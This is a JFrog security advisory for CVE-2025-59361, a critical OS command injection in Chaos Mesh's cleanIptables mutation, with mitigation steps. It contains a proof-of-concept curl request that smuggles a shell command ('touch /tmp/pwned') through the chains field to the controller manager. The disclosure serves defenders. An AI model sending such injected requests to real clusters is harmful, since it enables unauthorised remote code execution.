JFrog Security Research
< Back

JFSA-2025-001449536 - Chaos Mesh cleanIptables command injection

CVE-2025-59361 | CVSS 9.8

JFrog Severity:critical

Discovered ByNatan Nehoraiof the JFrog Security Research Team

Published 15 Sep, 2025 | Last updated 15 Sep, 2025

OS command injection in Chaos Mesh via the cleanIptables mutation

github.com/chaos-mesh/chaos-mesh

(,2.7.2]

The cleanIptables mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.

curl -X POST -H "Content-Type: application/json" -d /
'{"query": "mutation CleanIptablesInPod { 
pod(ns: \"chaos-mesh\", name: \"chaos-dashboard-5c6575bd9f-b5tqg\") {
 cleanIptables(chains: [\"INPUT;touch /tmp/pwned; \", \"OUTPUT\", \"FORWARD\", \"CHAOS-MESH-INPUT\", \"CHAOS-MESH-OUTPUT\"])
 }
 }"}' http://controller-manager-host:10082/query

If upgrading Chaos-Mesh to the fixed version is not possible, re-deploy the Helm chart and disable the chaosctl tool and port:

helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false

Fix PR

JFrog Technical Blog

< Back